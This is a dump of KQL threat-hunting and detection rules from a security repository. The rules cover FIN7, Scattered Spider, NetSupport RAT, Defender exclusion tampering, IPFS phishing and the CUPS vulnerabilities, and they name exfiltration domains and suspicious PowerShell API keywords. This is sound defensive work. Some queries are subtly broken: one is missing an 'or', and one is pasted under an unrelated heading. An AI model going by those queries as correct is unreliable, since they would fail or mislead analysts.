Directory (FIN7) 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1059.001 | Command and Scripting Interpreter: PowerShell | [Command and Scripting Interpreter: PowerShell](https://attack.mitre.org/techniques/T1059/001/)| 10 | 11 | #### Description 12 | Detection opportunity: Launching PowerShell scripts from **windowsapps** directory 13 | 14 | This pseudo-detector looks for the execution of PowerShell scripts from the windowsapps directory. There are instances where benign PowerShell scripts run from this directory, but analysts can sort out malicious or suspicious activity by investigating follow-on actions and network connections. However, in this case we see the adversary calling `StartingScriptWrapper.ps1` from the windowsapps directory to execute their malicious payload script. 15 | 16 | #### Risk 17 | FIN7 have been observed performing this behaviour in recent intrusions. FIN7 activity has frequently preceded ransomware deployment. We’ve detected activity within this cluster attempting to install malicious instances of NetSupport Manager RAT. In the detections we’ve observed within this cluster, the adversary leverages the MSIX-PackageSupportFramework tool to create their malicious MSIX files. When the victim opens the MSIX, the StartingScriptWrapper.ps1 component of the MSIX package support framework launches an embedded PowerShell script from the windowsapps directory. 
#### Author
- **Name:** Gavin Knapp
- **Github:** https://github.com/m4nbat
- **Twitter:** https://twitter.com/knappresearchlb
- **LinkedIn:** https://www.linkedin.com/in/grjk83/
- **Website:**

#### References
- [redcanary](https://redcanary.com/blog/msix-installers/)

## Defender For Endpoint
```KQL
DeviceProcessEvents
| where InitiatingProcessFolderPath contains "windowsapps" and FileName =~ "powershell.exe" and ProcessCommandLine has_all ("windowsapps","-file",".ps1")
```
## Sentinel
```KQL
DeviceProcessEvents
| where InitiatingProcessFolderPath contains "windowsapps" and FileName =~ "powershell.exe" and ProcessCommandLine has_all ("windowsapps","-file",".ps1")
```
--------------------------------------------------------------------------------
/nf_ttp_t1127-001_suspNetworkConnMSBuild.md:
--------------------------------------------------------------------------------
# TTP Detection Rule: Suspicious network connection from MSBuild

## Query Information

#### MITRE ATT&CK Technique(s)

| Technique ID | Title | Link |
| --- | --- | --- |
| T1127.001 | Trusted Developer Utilities Proxy Execution: MSBuild | [MSBuild](https://attack.mitre.org/techniques/T1127/001/) |

#### Description
Detection opportunity: MSBuild without commands

In some detections, we observed the Microsoft Build Engine (msbuild.exe) making outbound network connections to IPs associated with the ArechClient2 remote access tool. In general, it is suspicious for msbuild.exe to execute without a corresponding command line, which is precisely what we observed here. Simply looking for execution of msbuild.exe without a corresponding command line and examining surrounding activity for suspicious network connections and child processes could help detect this threat.
15 | 16 | #### Risk 17 | FIN7, ZLoader, and FakeBat have been observed performing this behaviour in recent intrusions. Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. 18 | 19 | #### Author 20 | - **Name:** Gavin Knapp 21 | - **Github:** https://github.com/m4nbat 22 | - **Twitter:** https://twitter.com/knappresearchlb 23 | - **LinkedIn:** https://www.linkedin.com/in/grjk83/ 24 | - **Website:** 25 | 26 | #### References 27 | - [redcanary](https://redcanary.com/blog/msix-installers/) 28 | 29 | ## Defender For Endpoint 30 | ```KQL 31 | // Detection opportunity 5: MSBuild without commands 32 | DeviceNetworkEvents 33 | | where InitiatingProcessFileName =~ "msbuild.exe" and (isempty(InitiatingProcessCommandLine) or InitiatingProcessCommandLine =~ "msbuild.exe") 34 | ``` 35 | ## Sentinel 36 | ```KQL 37 | // Detection opportunity 5: MSBuild without commands 38 | DeviceNetworkEvents 39 | | where InitiatingProcessFileName =~ "msbuild.exe" and (isempty(InitiatingProcessCommandLine) or InitiatingProcessCommandLine =~ "msbuild.exe") 40 | ``` 41 | -------------------------------------------------------------------------------- /nf_ttp_t1219_netsupportrat_fin7.md: -------------------------------------------------------------------------------- 1 | # TTP Detection Rule: NetSupport running from unexpected directory (FIN7) 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1219 | Remote Access Software | [Remote Access Software](https://attack.mitre.org/techniques/T1219/)| 10 | 11 | #### Description 12 | Detection opportunity: NetSupport running from unexpected directory 13 | 14 | In the instances where the adversary delivered NetSupport Manager RAT as a follow-on payload, our existing detection coverage for malicious NetSupport installation served us well. 
Under normal circumstances, you should expect NetSupport Manager to run from the program files directory. If you find NetSupport Manager—often identifiable as client32.exe—running outside the program files directory, particularly from the programdata directory, then it’s worth investigating. 15 | 16 | #### Risk 17 | FIN7 have been observed performing this behaviour in recent intrusions. FIN7 activity has frequently preceded ransomware deployment. We’ve detected activity within this cluster attempting to install malicious instances of NetSupport Manager RAT. In the detections we’ve observed within this cluster, the adversary leverages the MSIX-PackageSupportFramework tool to create their malicious MSIX files. When the victim opens the MSIX, the StartingScriptWrapper.ps1 component of the MSIX package support framework launches an embedded PowerShell script from the windowsapps directory. 18 | 19 | #### Author 20 | - **Name:** Gavin Knapp 21 | - **Github:** https://github.com/m4nbat 22 | - **Twitter:** https://twitter.com/knappresearchlb 23 | - **LinkedIn:** https://www.linkedin.com/in/grjk83/ 24 | - **Website:** 25 | 26 | #### References 27 | - [redcanary](https://redcanary.com/blog/msix-installers/) 28 | 29 | ## Defender For Endpoint 30 | ```KQL 31 | // Detection opportunity 2: NetSupport running from unexpected directory 32 | DeviceProcessEvents 33 | | where ( ProcessVersionInfoCompanyName contains "netsupport" or ProcessVersionInfoProductName contains "netsupport" ProcessVersionInfoCompanyName contains "Crosstec" or ProcessVersionInfoProductName contains "Crosstec") and not ( FolderPath has_any ("Program Files (x86)\\","Program Files\\")) 34 | ``` 35 | ## Sentinel 36 | ```KQL 37 | // Detection opportunity 2: NetSupport running from unexpected directory 38 | DeviceProcessEvents 39 | | where ( ProcessVersionInfoCompanyName contains "netsupport" or ProcessVersionInfoProductName contains "netsupport" ProcessVersionInfoCompanyName contains "Crosstec" or 
ProcessVersionInfoProductName contains "Crosstec") and not ( FolderPath has_any ("Program Files (x86)\\","Program Files\\")) 40 | ``` 41 | -------------------------------------------------------------------------------- /nf_ttp_t1543_scattered-spider_azure_arc_persistence.md: -------------------------------------------------------------------------------- 1 | # Azure ARC Related Persistence Detection 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|----------------------------------|----------------------------------------| 9 | | T1543 | Create or Modify System Process | [Create or Modify System Process](https://attack.mitre.org/techniques/T1543/) | 10 | 11 | #### Description 12 | This detection rule aims to identify the unexpected installation of Azure ARC agents. Scattered Spider has been known to register their own Azure tenant and install Azure ARC agents on devices to maintain persistence. The rule includes two queries: one for detecting service installations and another for identifying specific file path creations associated with Azure ARC agents. 13 | 14 | #### Risk 15 | The risk addressed by this detection rule is the unauthorized installation of Azure ARC agents, which can be used as a persistence mechanism by attackers. This technique allows them to maintain long-term access to compromised systems and potentially exert control over a wider network. 
16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 20 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 21 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 22 | - **Website:** 23 | 24 | #### References 25 | - [Azure ARC Agent Overview](https://learn.microsoft.com/en-us/azure/azure-arc/servers/agent-overview) 26 | - [Microsoft Security Blog on Azure ARC](https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/) 27 | 28 | ## Defender For Endpoint 29 | ```KQL 30 | // Unexpected installation of azure arc agent - service installation (ServiceInstalled events whose parsed ServiceName matches one of the Arc agent binaries) 31 | let ServiceNames = datatable(name:string)["himds.exe","gc_arc_service.exe","gc_extension_service.exe"]; // NOTE(review): these are executable names; confirm the ServiceInstalled ServiceName field carries the binary name rather than the registered service name, otherwise has_any() below matches nothing 32 | DeviceEvents 33 | | where ActionType =~ "ServiceInstalled" 34 | | extend ServiceName = tostring(parse_json(AdditionalFields).ServiceName) 35 | | extend ServiceAccount = tostring(parse_json(AdditionalFields).ServiceAccount) 36 | | extend ServiceStartType = tostring(parse_json(AdditionalFields).ServiceStartType) 37 | | extend ServiceType = tostring(parse_json(AdditionalFields).ServiceType) 38 | | where ServiceName has_any (ServiceNames) 39 | ``` 40 | 41 | ```KQL 42 | // Unexpected installation of azure arc agent - filepaths (file creations under the Arc guest-configuration service directory) 43 | let AzureArcServicePaths = datatable(name:string)[@"\\AzureConnectedMachineAgent\\GCArcService\\GC"]; // NOTE(review): inside a verbatim @"" string the doubled backslashes are literal; has_any() term matching should tolerate that, but a contains()/startswith() comparison against a real path would not 44 | DeviceFileEvents 45 | | where ActionType =~ "FileCreated" 46 | | where FolderPath has_any (AzureArcServicePaths) 47 | ``` 48 | -------------------------------------------------------------------------------- /nf_ttp_t1547-001_yellowcockatoo_powershell_create_link_in_starup: -------------------------------------------------------------------------------- 1 | # *PowerShell Creating LNK Files within a Startup Directory Detection* 2 | 3 | ## Query Information 4 | 5 
| #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|-----------------------------|-----------------------------------------| 9 | | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001/) | 10 | 11 | #### Description 12 | This detection rule identifies instances of PowerShell creating LNK (shortcut) files in a startup directory, a technique often used in malware distribution, such as with the Yellow Cockatoo malware. This behavior can be indicative of malicious activity, as malware often uses LNK files in startup locations to execute upon system boot. However, benign homegrown utilities or installers may also create .lnk files in these locations, necessitating further investigation to confirm the nature of the activity. 13 | 14 | #### Risk 15 | The risk addressed by this rule is the unauthorized or malicious use of autostart mechanisms to maintain persistence or execute malware. This technique can lead to prolonged unauthorized access or the execution of harmful scripts without user intervention. 
16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 20 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 21 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 22 | - **Website:** 23 | 24 | #### References 25 | - [Red Canary Intelligence Insights - December 2022](https://redcanary.com/blog/intelligence-insights-december-2022/) 26 | 27 | ## Defender For Endpoint 28 | ```KQL 29 | // PowerShell creating LNK files within a startup directory 30 | let trusedUtilsInstallingLnkInStartup = datatable (util:string)["mytrustedutility.exe"]; 31 | DeviceFileEvents 32 | | where ActionType =~ "FileCreated" 33 | and InitiatingProcessFileName =~ "powershell.exe" 34 | and FolderPath contains @"start menu\programs\startup" 35 | and not(InitiatingProcessCommandLine has_any (trusedUtilsInstallingLnkInStartup)) 36 | -------------------------------------------------------------------------------- /nf_ttp_t1562-001_disabledefender.md: -------------------------------------------------------------------------------- 1 | # TTP Detection Rule: Abusing PowerShell to disable Defender components 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1562.001 | Impair Defenses: Disable or Modify Tools | [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001/)| 10 | 11 | #### Description 12 | Detection opportunity: Abusing PowerShell to disable Defender components 13 | 14 | We also observed at least one of these adversaries abusing PowerShell to exclude certain files or processes from Windows Defender scanning. Luckily, this is common tradecraft for which we’ve shared similar detection ideas on multiple occasions. 
The following may unearth this and other threats: 15 | 16 | #### Risk 17 | FIN7, ZLoader, and FakeBat have been observed performing this behaviour in recent intrusions. Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. 18 | 19 | #### Author 20 | - **Name:** Gavin Knapp 21 | - **Github:** https://github.com/m4nbat 22 | - **Twitter:** https://twitter.com/knappresearchlb 23 | - **LinkedIn:** https://www.linkedin.com/in/grjk83/ 24 | - **Website:** 25 | 26 | #### References 27 | - https://redcanary.com/blog/msix-installers/ 28 | 29 | ## Defender For Endpoint 30 | ```KQL 31 | //Detection opportunity 3: Abusing PowerShell to disable Defender components 32 | DeviceProcessEvents 33 | | where FileName =~ "powershell.exe" and ProcessCommandLine has_any ("Add-MpPreference","Set-MpPreference") and ProcessCommandLine has_any ("ExclusionProcess","ExclusionPath") 34 | ``` 35 | ## Sentinel 36 | ```KQL 37 | //Detection opportunity 3: Abusing PowerShell to disable Defender components 38 | DeviceProcessEvents 39 | | where FileName =~ "powershell.exe" and ProcessCommandLine has_any ("Add-MpPreference","Set-MpPreference") and ProcessCommandLine has_any ("ExclusionProcess","ExclusionPath") 40 | ``` 41 | -------------------------------------------------------------------------------- /nf_ttp_t1562.001_scattered-spider_abuse conditional_access_trusted_locations.md: -------------------------------------------------------------------------------- 1 | # *Scattered Spider Defense Evasion via Conditional Access Policies Detection* 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|-----------------------------------|-------------------------------------------------------| 9 | | T1562.001 | Impair Defenses: Disable or Modify Tools | [Impair Defenses: Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001/) | 10 | 11 | #### Description 
12 | This detection rule focuses on identifying modifications to Conditional Access Policies, a tactic employed by threat actors like Scattered Spider for defense evasion. The rule includes two queries: one for detecting updates to conditional access policies, specifically changes in 'locations' and 'excludeLocations', and another for identifying the addition of trusted locations, which can be indicative of an attacker trying to bypass security measures. 13 | 14 | #### Risk 15 | The risk addressed here is the manipulation of access controls to evade detection and maintain persistent access. Modifying conditional access policies can allow attackers to operate undetected within a network, as these changes might weaken the security posture or create blind spots. 16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 20 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 21 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 22 | - **Website:** 23 | 24 | #### References 25 | - [Microsoft Documentation on Conditional Access Policies](https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/) 26 | - [MITRE ATT&CK on Defense Evasion](https://attack.mitre.org/tactics/TA0005/) 27 | 28 | ## Defender For Endpoint 29 | ```KQL 30 | AuditLogs 31 | | where OperationName =~ "Update conditional access policy" and TargetResources has_all ('locations','excludeLocations') 32 | -------------------------------------------------------------------------------- /nf_ttp_t1566-001_IPFS_Web3_Phishing.md: -------------------------------------------------------------------------------- 1 | # TTP Detection Rule: Check for Phishing Emails Using IPFS in Phishing Campaigns 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | 
|--------------|-----------------------------|------------------------------------------| 9 | | T1566.002 | Phishing: Spearphishing Link| [Phishing: Spearphishing Link](https://attack.mitre.org/techniques/T1566/002/) | 10 | 11 | #### Description 12 | This detection rule focuses on identifying phishing emails that potentially use the InterPlanetary File System (IPFS) to host malicious content. The usage of IPFS in phishing campaigns is a sophisticated technique as it can bypass conventional security measures. The rule involves checking for subsequent connections to IPFS-hosted sites, which could indicate the execution of a phishing attack utilizing this decentralized file hosting system. 13 | 14 | #### Risk 15 | The risk targeted by this detection rule is the exploitation of IPFS in phishing campaigns, a method that could lead to successful phishing attacks due to the unconventional nature of IPFS as a hosting platform. Phishing attacks using IPFS can be more difficult to detect and can pose a significant threat to organizational security. 16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 20 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 21 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 22 | - **Website:** 23 | 24 | #### References 25 | - [Talos Intelligence on IPFS Abuse](https://blog.talosintelligence.com/ipfs-abuse/) 26 | - [Cisco-Talos IOCs](https://github.com/Cisco-Talos/IOCs/tree/main/2022/11) 27 | - [Volexity Threat Intel](https://raw.githubusercontent.com/volexity/threat-intel/main/2023/2023-06-28%20POWERSTAR/attachments/ipfs.txt) 28 | 29 | ## Defender For Endpoint 30 | 31 | ```KQL 32 | //check for phishing emails potentially using ipfs to host malicious content used in phishing campaigns. 
33 | let domains = externaldata (data:string)[h@"https://raw.githubusercontent.com/volexity/threat-intel/main/2023/2023-06-28%20POWERSTAR/attachments/ipfs.txt"]; 34 | EmailEvents 35 | | where Timestamp > ago (30d) 36 | | join EmailUrlInfo on NetworkMessageId 37 | | where Url has_any (domains) and DeliveryAction !~ "Blocked" 38 | ``` 39 | ## Sentinel 40 | 41 | ```KQL 42 | //check for subsequent connections to the site 43 | let domains = externaldata (data:string) 44 | [h@"https://raw.githubusercontent.com/volexity/threat-intel/main/2023/2023-06-28%20POWERSTAR/attachments/ipfs.txt"]; 45 | DeviceNetworkEvents 46 | | where TimeGenerated > ago (30d) 47 | | where RemoteUrl has_any (domains) 48 | ``` 49 | -------------------------------------------------------------------------------- /nf_ttp_t1567-002_scattered-spider_exfiltration.md: -------------------------------------------------------------------------------- 1 | # Exfiltration to Known Scattered Spider Domains Detection 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|---------------------------------|----------------------------------------------| 9 | | T1567.002 | Exfiltration to Cloud Storage | [Exfiltration to Cloud Storage ](https://attack.mitre.org/techniques/T1567/002/) | 10 | 11 | #### Description 12 | This detection rule aims to identify data exfiltration attempts to domains known to be associated with the Scattered Spider threat group. The query searches for network events where devices connect to a list of predefined domains, such as "transfer.sh", "Mega.nz", and "riseup.net", which are commonly used by Scattered Spider for data exfiltration. 13 | 14 | #### Risk 15 | The primary risk addressed by this rule is the unauthorized transmission of sensitive data to external servers controlled by attackers. Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. 
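Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet. Exfiltration to these specific domains can signify an active compromise or data breach attempt. 16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 20 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 21 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 22 | - **Website:** 23 | 24 | #### References 25 | - [CISA Advisory on Data Exfiltration Techniques](https://www.cisa.gov/uscert/ncas/alerts) 26 | - [Microsoft Security Blog on Cyber Threats](https://www.microsoft.com/en-us/security/blog/) 27 | 28 | ## Defender For Endpoint 29 | ```KQL 30 | // Exfiltration to known Scattered Spider Domains: hourly count of connections per device to the listed hosts 31 | let exfilDomains = dynamic(["transfer.sh", "Mega.nz", "mega.co.nz", "riseup.net"]); // mega.co.nz added: MEGA API/upload hosts such as g.api.mega.co.nz do not contain the term "mega.nz" 32 | DeviceNetworkEvents 33 | | where RemoteUrl has_any (exfilDomains) // case-insensitive term match, so subdomains and full URLs are caught (an exact "in" comparison would miss them) 34 | | summarize count() by DeviceName, bin(Timestamp, 1h) // bucket per hour; grouping on the raw Timestamp yields one row per event 35 | ``` 36 | 37 | ## Sentinel 38 | ```KQL 39 | // Exfiltration to known Scattered Spider Domains: hourly count of connections per device to the listed hosts 40 | let exfilDomains = dynamic(["transfer.sh", "Mega.nz", "mega.co.nz", "riseup.net"]); // mega.co.nz added: MEGA API/upload hosts such as g.api.mega.co.nz do not contain the term "mega.nz" 41 | DeviceNetworkEvents 42 | | where RemoteUrl has_any (exfilDomains) // case-insensitive term match, so subdomains and full URLs are caught (an exact "in" comparison would miss them) 43 | | summarize count() by DeviceName, bin(TimeGenerated, 1h) // bucket per hour; grouping on the raw TimeGenerated yields one row per event 44 | 45 | ``` 46 | -------------------------------------------------------------------------------- /nf_vuln_linux_cups.md: -------------------------------------------------------------------------------- 1 | # TTP Detection Rule: Hunt queries for scoping the Linux CUPS Vulnerability 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | | | | 10 | 11 | #### Description 12 | Hunt queries for scoping vulnerable devices with the Linux CUPS Vulnerability. 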
13 | 14 | From SANS ISC: 15 | _"CUPS may use "filters", executables that can be used to convert documents. The part responsible ("cups-filters") accepts unverified data that may then be executed as part of a filter operation. An attacker can use this vulnerability to inject a malicious "printer". The malicious code is triggered once a user uses this printer to print a document. This has little or no impact if CUPS is not listening on port 631, and the system is not used to print documents (like most servers). An attacker may, however, be able to trigger the print operation remotely. On the local network, this is exploitable via DNS service discovery. A proof of concept exploit has been made available."_ 16 | 17 | There is no patch right now. Disable and remove cups-browserd (you probably do not need it anyway). Update CUPS as updates become available. Stop UDP traffic on Port 631. 18 | 19 | Related CVE's 20 | - CVE-2024-47176 21 | - CVE-2024-47076 22 | - CVE-2024-47115 23 | - CVE-2024-47177 24 | 25 | #### Risk 26 | This vulnerability should be remediated on internet facing devices before proof of concept exploits are released and used in mass exploitation activity by threat actors. 
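27 | 28 | #### Author 29 | - **Name:** Gavin Knapp 30 | - **Github:** https://github.com/m4nbat 31 | - **Twitter:** https://twitter.com/knappresearchlb 32 | - **LinkedIn:** https://www.linkedin.com/in/grjk83/ 33 | - **Website:** 34 | 35 | #### References 36 | - https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/ 37 | - https://isc.sans.edu/diary/Patch%20for%20Critical%20CUPS%20vulnerability%3A%20Don%27t%20Panic/31302 38 | 39 | ## Defender For Endpoint 40 | ```KQL 41 | DeviceTvmSoftwareInventory 42 | | where OSPlatform =~ "Linux" 43 | | where SoftwareName contains "cups" 44 | ``` 45 | ```KQL 46 | let linuxHosts = DeviceInfo 47 | | where OSPlatform =~ "Linux" | distinct DeviceId ; 48 | DeviceNetworkEvents 49 | | where DeviceId in~ (linuxHosts) 50 | | where LocalPort == 631 51 | ``` 52 | 53 | ```KQL 54 | //Maybe but untested: file creations on Linux hosts that have had port 631 traffic, by (or named like) a process that touched port 631 55 | let linuxHosts = DeviceInfo 56 | | where OSPlatform =~ "Linux" | distinct DeviceId ; 57 | let devicesRunning631 = DeviceNetworkEvents | where DeviceId in~ (linuxHosts) | where RemotePort == 631 or LocalPort == 631 | distinct DeviceId; 58 | // in~()/has_any() need a single-column tabular argument, so the device list and the process-name list are kept separate (one two-column list fails to run) and devices are keyed by DeviceId, not DeviceName 59 | let processesOn631 = DeviceNetworkEvents | where DeviceId in~ (linuxHosts) | where RemotePort == 631 or LocalPort == 631 | distinct InitiatingProcessFileName; 60 | // in~ is an exact case-insensitive match on the whole file name, which is what a process-name list needs 61 | DeviceFileEvents 62 | | where DeviceId in~ (devicesRunning631) and ( FileName in~ (processesOn631) or InitiatingProcessFileName in~ (processesOn631) ) and ActionType =~ "FileCreated" 63 | ``` 64 | ```KQL 65 | //Internet facing devices with it: 66 | DeviceInfo 67 | | where Timestamp > ago(7d) 68 | | where IsInternetFacing and OSPlatform =~ "Linux" 69 | | extend InternetFacingInfo = AdditionalFields 70 | | extend InternetFacingReason = extractjson("$.InternetFacingReason", InternetFacingInfo, typeof(string)), InternetFacingLocalPort = extractjson("$.InternetFacingLocalPort", InternetFacingInfo, typeof(int)), InternetFacingScannedPublicPort = extractjson("$.InternetFacingPublicScannedPort", InternetFacingInfo, typeof(int)), InternetFacingScannedPublicIp = extractjson("$.InternetFacingPublicScannedIp", InternetFacingInfo, 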
typeof(string)), InternetFacingLocalIp = extractjson("$.InternetFacingLocalIp", InternetFacingInfo, typeof(string)),InternetFacingTransportProtocol=extractjson("$.InternetFacingTransportProtocol", InternetFacingInfo, typeof(string)), InternetFacingLastSeen = extractjson("$.InternetFacingLastSeen", InternetFacingInfo, typeof(datetime)) 71 | | summarize arg_max(Timestamp, *) by DeviceId 72 | | join DeviceNetworkEvents on DeviceId 73 | | where LocalPort == 631 74 | ``` 75 | 76 | ## Defender EASM 77 | 78 | ```KQL 79 | // Detection opportunity 2: NetSupport running from unexpected directory 80 | DeviceProcessEvents 81 | | where ( ProcessVersionInfoCompanyName contains "netsupport" or ProcessVersionInfoProductName contains "netsupport" ProcessVersionInfoCompanyName contains "Crosstec" or ProcessVersionInfoProductName contains "Crosstec") and not ( FolderPath has_any ("Program Files (x86)\\","Program Files\\")) 82 | ``` 83 | -------------------------------------------------------------------------------- /powerShellHunts.md: -------------------------------------------------------------------------------- 1 | 2 | ## PowerShell creating external network connections followed by commands (may be noisy) 3 | 4 | DeviceNetworkEvents 5 | | where InitiatingProcessParentFileName != @"SenseIR.exe" 6 | | where ActionType == 'ConnectionSuccess' 7 | | where InitiatingProcessFileName has_any ("pwsh.exe","powershell.exe") 8 | | where RemoteUrl !contains "winatp-gw" 9 | | where RemoteIPType == "Public" 10 | | project Timestamp, DeviceName,NetConTimestamp = Timestamp, RemoteIP, RemoteUrl, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessCreationTime, InitiatingProcessId, InitiatingProcessParentFileName 11 | | join kind= leftouter( 12 | DeviceEvents 13 | | where ActionType == 'PowerShellCommand' 14 | | project PsCommandTimestamp = Timestamp, DeviceName, InitiatingProcessCommandLine, InitiatingProcessCreationTime, InitiatingProcessFileName, InitiatingProcessId, 
AdditionalFields, PSCommand=extractjson("$.Command", AdditionalFields, typeof(string)) 15 | ) on InitiatingProcessCommandLine, InitiatingProcessCreationTime, InitiatingProcessFileName, InitiatingProcessId, DeviceName 16 | | join kind=leftouter( 17 | DeviceProcessEvents 18 | | project ChildProcessStartTime = Timestamp, ChildProcessName = FileName, ChildProcessSHA1 = SHA1, ChildProcessCommandline = ProcessCommandLine, InitiatingProcessCommandLine, InitiatingProcessCreationTime, InitiatingProcessFileName, InitiatingProcessId, DeviceName 19 | ) on InitiatingProcessCommandLine, InitiatingProcessCreationTime, InitiatingProcessFileName, InitiatingProcessId, DeviceName 20 | | project DeviceName, NetConTimestamp, RemoteIP, RemoteUrl,InitiatingProcessParentFileName,InitiatingProcessFileName, InitiatingProcessCommandLine, PsCommandTimestamp, PSCommand, ChildProcessStartTime, ChildProcessName, ChildProcessSHA1, ChildProcessCommandline 21 | 22 | ## Powershell creating .exe 23 | 24 | DeviceFileEvents 25 | | where InitiatingProcessParentFileName != @"SenseIR.exe" 26 | | where InitiatingProcessFileName has_any ("pwsh.exe","powershell.exe") 27 | | where ActionType == 'FileCreated' 28 | | where FileName endswith ".exe" 29 | | project Timestamp, FileCreationTimestamp = Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, SHA1, FileName, DeviceName 30 | | join ( 31 | DeviceProcessEvents 32 | | project DeviceName, SHA1, FileName, ProcessCreationTimestamp = Timestamp, ProcessCommandLine, FolderPath, ProcessCreationParentName = InitiatingProcessFileName, ProcessCreationParentCmdline = InitiatingProcessCommandLine, ProcessCreationParentFolderPath = InitiatingProcessFolderPath, ProcessCreationGrandParentName = InitiatingProcessParentFileName 33 | ) on FileName, SHA1, DeviceName 34 | | project DeviceName, FileCreationTimestamp, FileName, SHA1, ProcessCreationTimestamp, FolderPath, ProcessCommandLine, ProcessCreationParentName, 
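ProcessCreationParentCmdline, ProcessCreationParentFolderPath, ProcessCreationGrandParentName 35 | 36 | 37 | ## PowerShell DLLs being called by non-PowerShell processes 38 | 39 | ``` 40 | DeviceImageLoadEvents 41 | | where TimeGenerated > ago(30d) 42 | | where FileName in~ ("System.Management.Automation.Dll","System.Management.Automation.ni.Dll","System.Reflection.Dll") and ActionType =~ "ImageLoaded" // in~ is an exact match, so the truncated "System.Reflection.Dl" could never match a loaded image 43 | | where InitiatingProcessFolderPath !in~ (@"c:\windows\system32\windowspowershell\v1.0\powershell.exe",@"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe",@"c:\program files\microsoft visual studio\2022\community\common7\ide\devenv.exe") and not (InitiatingProcessFileName =~ "mscorsvw.exe" and InitiatingProcessCommandLine has_all (@"mscorsvw.exe","-StartupEvent","-InterruptEvent","-NGENProcess","-Pipe","-Comment","NGen Worker Process")) and not (InitiatingProcessFolderPath startswith @"c:\program files\microsoft visual studio\" and InitiatingProcessFileName startswith "ServiceHub") // exclusions are by full install path on purpose, so a relocated or renamed powershell.exe still surfaces; NOTE(review): pwsh.exe (PowerShell 7) is not excluded and presumably loads these assemblies too — add its install path if it proves noisy 44 | ``` 45 | -------------------------------------------------------------------------------- /powershell_dirty_word_detection.md: -------------------------------------------------------------------------------- 1 | # 2 | 3 | ## SOURCE 4 | 5 | - https://gist.github.com/nasbench/50cd0b64bedacabccecc9149c15228da#file-pwsh_dirty_words-yml 6 | 7 | ## MDE 8 | 9 | ``` 10 | let dirtyWordList = datatable(word:string)["Add-Type" 11 | ,"AddSecurityPackage" 12 | ,"AdjustTokenPrivileges" 13 | ,"AllocHGlobal" 14 | ,"BindingFlags" 15 | ,"Bypass" 16 | ,"CloseHandle" 17 | ,"CreateDecryptor" 18 | ,"CreateEncryptor" 19 | ,"CreateProcessWithToken" 20 | ,"CreateRemoteThread" 21 | ,"CreateThread" 22 | ,"CreateType" 23 | ,"CreateUserThread" 24 | ,"Cryptography" 25 | ,"CryptoServiceProvider" 26 | ,"CryptoStream" 27 | ,"DangerousGetHandle" 28 | ,"DeclaringMethod" 29 | ,"DeclaringType" 30 | ,"DefineConstructor" 31 | ,"DefineDynamicAssembly" 32 | ,"DefineDynamicModule" 33 | ,"DefineEnum" 34 | 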
